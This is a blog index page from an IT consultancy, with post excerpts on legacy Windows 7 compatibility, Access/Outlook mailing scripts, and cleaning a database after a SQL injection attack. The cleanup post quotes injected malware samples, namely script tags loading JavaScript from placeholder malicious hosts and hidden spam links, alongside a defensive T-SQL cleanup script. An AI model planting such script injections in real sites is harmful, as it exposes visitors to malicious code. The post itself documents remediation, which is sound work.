DynaZIP OCX Installation Under Windows 7

Programming, Tips  Tagged , No Comments »
Posted by

We have a client who has an old in-house app that relies on the DynaZIP 32-Bit OCX Interface to run.  We've been trying to get it to run under Windows 7, but couldn't find much info -- but I happened to come across a text file from DynaZIP that had the dependencies on it, and it turned out we were missing a couple files; loaded them into SYSWOW64 and the OCXs register.

You need to make sure the following files are in your c:\windows\ syswow64 directory:

  • OC30.DLL
  • MSVCRT20.DLL
  • MFCANS32.DLL
  • OLE2.DLL
  • COMPOBJ.DLL
  • STORAGE.DLL
  • OLE2DISP.DLL
  • OLE2NLS.DLL
  • TYPELIB.DLL
  • DZIP32.DLL
  • DUNZIP32.DLL
  • DZOCX32.OCX
  • DUZOCX32.OCX
  • DZSTAT32.OCX

Then open a command prompt with admin privileges and run REGSVR32 on the lot of OCXs.

ADO Problems (Error 430) with VB6 on Windows 7

Programming, Technology  Tagged , No Comments »
Posted by

Lot of numbers in that heading. :)

We've made the move to Windows 7 and we love it.  However, we haven't really made the move to VB.NET.  I still like developing in VB6; I know that makes me a little bit of a relic, but I don't do that much development these days to justify the investment in fully ramping up on VB.NET.

So, I had to tweak a legacy application I wrote which reads an email from a POP3 mailbox and writes the contents into a database.  The program is maybe 30 lines long, and it's a dream thanks to the w3JMail library and ADO.

I revised the program, ran it on my Windows 7 machine, and all was right in the world.  I went to deploy it back to the Windows 2003 server where it lives, and I was hit with Error 430 errors: "Class does not support Automation or does not support expected interface"

So, after adding line numbers to the code, I was able to track the error down to the line

Set objConn = New ADODB.Connection

That seemed weird.  I tried a bunch of different ADO libraries and nothing.  Then I stumbled upon a MSKB article, with the longest, most specific title I've seen in recent memory: "An ADO application does not run on down-level operating systems after you recompile it on a computer that is running Windows 7 SP 1 or Windows Server 2008 R2 SP 1 or that has KB983246 installed"

Long story short, if you're running Win7 SP1 or Win08R2 SP1, then .NET breaks ADO and you need to register some new type libraries on your local machine and then recompile using those type libraries, NOT the usual ADO libraries.

The KB article shows you how to do it easily enough. Put the files where they tell you.  I had to manually navigate to the folders for some reason, but once I did, they registered up like a charm and my programs ran again.

Cleaning Up After a SQL Injection Attack, Part 2

Programming, Security  Tagged , , , 4 Comments »
Posted by

Got a call today off our previous article in this series from Branden of Hot Media Group, Inc., aChicago-based web application development, networking, and graphic design firm who found himself with a database full of malware infections, but the characteristics of his attack didn't match what we had written about, so he called us up. We reviewed his symptoms and were able to tweak the code we provided previously to work with this new set of issues.

We weren't able to see how the site was attacked, nor did we worry about how the site would be steeled against future occurrence (always use stored procedures and/or parametrized queries, kids!) -- this was purely a cleanup job.

This is the code we had:

DECLARE @T VARCHAR(255),@C VARCHAR(255)
DECLARE Table_Cursor CURSOR FOR
SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=35 OR b.xtype=231 OR b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN
PRINT ('UPDATE ['+@T+'] SET ['+@C+']=REPLACE(['+@C+'],'''', '''')') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u' AND b.xtype=99 OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN PRINT ('UPDATE ['+@T+'] SET ['+@C+']=cast(replace(cast(['+@C+'] as nvarchar(4000)),'''','''') as ntext)')
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor

And that worked fine, but it had some shortcomings -- mostly it only stripped out a single bit of invasive code, and our new friend had quite a bit of code to deal with, so instead of the almost quaint looking malware code:

<script src="hxxp://evilsite.evl/b.js"></script>

We had this jumble of code in every ntext field in his database:

<script type='text/javascript' src='http://google-anallytics.bad/urchin.js'></script>
<div style='display:none;'><a href='http://tests4all.bad/1/'>journals on losing post-pregnancy weight</a>
<a href='http://tests4all.bad/2/'>personal trainer certification atlanta</a>
<a href='http://tests4all.bad/3/'>quit smoking water vapor rings</a>
<a href='http://tests4all.bad/4/'>eyes in the darkness</a>
<a href='http://tests4all.bad/5/'>cheated map on dota 6.54b</a>
<a href='http://tests4all.bad/6/'>occupations for bored teen boys</a>
<a href='http://tests4all.bad/7/'>cgw southeast partners ilp</a>
<a href='http://tests4all.bad/8/'>does iq tests accurately measure intelligence</a>
<a href='http://tests4all.bad/9/'>free total psychic reading</a>
<a href='http://tests4all.bad/10/'>minnesota past life regression</a>
<a href='http://tests4all.bad/11/'>date of abraham lincolns death</a>

After trying to figure out the best way to escape all the single quotes, Branden -- an accomplished ColdFusion developer -- suggests "why don't we just drop everything to the right of the <script> tag?"
Read the rest of this entry »

Filtering Mailing Lists using Access and Outlook

Programming, Tips  Tagged , , , 14 Comments »
Posted by

In what is becoming a series, we'll further tweak our code to allow for filtering of the query.

In the original code, we open a query directly as a recordset. This fails if the query requires some parameters.

(I'm not going to demonstrate a way to get user input and use that as the parameter. You should be able to copy and paste the code from the original user input sections of the code and modify as needed.)

To start, let's discuss the query and it's parameter.

In our original code, the query was just pulling a list of email addresses. For this, let's filter that list of addresses by domain.
Read the rest of this entry »

Using Access and Outlook to Send To Mailing Lists

Productivity, Programming  Tagged , , , , 20 Comments »
Posted by

Perhaps the most popular article on the site explains how to send email to a bunch of people using Access and Outlook.

It has garnered its fair share of comments and emails, and one came in today that I figured I'd share and then elaborate on.

The mail reads (in part):

I have a following question: How to modify this module to be able to send messages to various mailing lists that I predefine in respective queries? In other words, I have in my database 3 categories of customers (in 3 different queries) andI want to address them with a different message. Do I need to create 3 macros running 3 modules each referring to a separate query with a given category of customers or is there another way to do it?

You don't have to create modules for each list, you just need to be able to tell the macro which query you want to use before running it.
Read the rest of this entry »


WordPress Theme & Icons by N.Design Studio. WPMU Theme pack by WPMU-DEV.
Entries RSS Comments RSS Log in